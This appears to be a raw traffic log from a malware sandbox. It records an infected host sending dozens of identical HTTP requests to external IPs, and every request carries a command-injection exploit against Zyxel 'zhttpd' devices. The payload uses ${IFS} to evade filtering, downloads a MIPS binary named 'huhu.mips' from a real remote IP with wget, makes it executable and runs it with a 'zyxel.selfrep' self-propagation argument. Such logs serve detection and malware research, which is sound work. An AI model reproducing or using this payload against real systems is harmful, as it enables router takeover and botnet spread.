                                      Jan 19, 2024 17:29:30.725244045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3790192.168.2.1445110117.129.52.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725274086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3791192.168.2.1434866162.124.189.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725312948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3792192.168.2.1433748189.12.15.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725348949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3793192.168.2.1442200205.243.176.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725402117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3794192.168.2.1449536139.179.19.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725426912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3795192.168.2.146051692.23.210.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725457907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3796192.168.2.143734063.43.30.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725512028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3797192.168.2.145135654.75.79.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725534916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3798192.168.2.1443020156.44.252.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725572109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3799192.168.2.144791084.133.25.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725605011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3800192.168.2.1450018159.79.194.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725646019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3801192.168.2.143596441.128.118.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725697041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3802192.168.2.1439244188.151.143.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725727081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3803192.168.2.145339634.106.74.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725768089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3804192.168.2.144287649.165.132.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725800037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3805192.168.2.1460404220.224.75.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725939989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3806192.168.2.144390688.210.155.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725984097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3807192.168.2.1456148147.242.161.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726022959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3808192.168.2.1458584157.216.160.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726058006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3809192.168.2.1448648161.107.41.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726088047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3810192.168.2.1434404150.255.9.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726130009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3811192.168.2.1437274131.118.98.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726169109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3812192.168.2.145540070.203.10.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726236105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3813192.168.2.1460776173.57.224.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726260900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3814192.168.2.145484481.44.95.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726300001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3815192.168.2.1457416159.134.53.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726325989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3816192.168.2.1435990114.68.241.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726366043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3817192.168.2.1438964179.199.113.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726424932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3818192.168.2.145494059.237.224.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726455927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3819192.168.2.1448560159.126.242.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726495028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3820192.168.2.1434302113.72.168.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726531029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3821192.168.2.1442432107.127.163.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726579905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3822192.168.2.1442420196.65.60.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726619959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3823192.168.2.1442912212.66.170.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726646900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3824192.168.2.14338322.152.132.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726684093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3825192.168.2.1445702135.76.200.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726716042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3826192.168.2.143874417.91.190.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726768970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3827192.168.2.1458708179.65.213.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726795912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3828192.168.2.1443154160.54.237.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726831913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3829192.168.2.1457574208.123.9.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726886034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3830192.168.2.143566084.177.250.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726912022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3831192.168.2.143698447.26.24.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.726963043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3832192.168.2.1453138207.61.171.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727010012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3833192.168.2.1452024166.179.254.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727041960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3834192.168.2.1459476210.206.151.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727083921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3835192.168.2.1450708174.123.142.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727122068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3836192.168.2.1459406106.60.243.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727159977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3837192.168.2.1441776195.251.30.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727211952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3838192.168.2.144409659.99.30.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727224112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3839192.168.2.1456726203.216.114.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727273941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3840192.168.2.145207665.230.5.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727298975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3841192.168.2.1445834161.173.107.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727336884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3842192.168.2.1433658217.220.158.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727389097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3843192.168.2.143946474.86.115.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727411032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3844192.168.2.1452310154.235.237.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727468014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3845192.168.2.1457048178.38.189.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727500916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3846192.168.2.1441690180.184.8.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727524042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3847192.168.2.144592474.97.139.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727567911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3848192.168.2.1434602210.71.47.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727621078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3849192.168.2.1460146143.120.12.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727660894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3850192.168.2.1446244125.173.43.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727704048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3851192.168.2.1455226184.181.37.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727741957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3852192.168.2.146083689.115.152.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.727782965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3853192.168.2.145396068.126.226.21443
                                      TimestampBytes transferredDirectionData
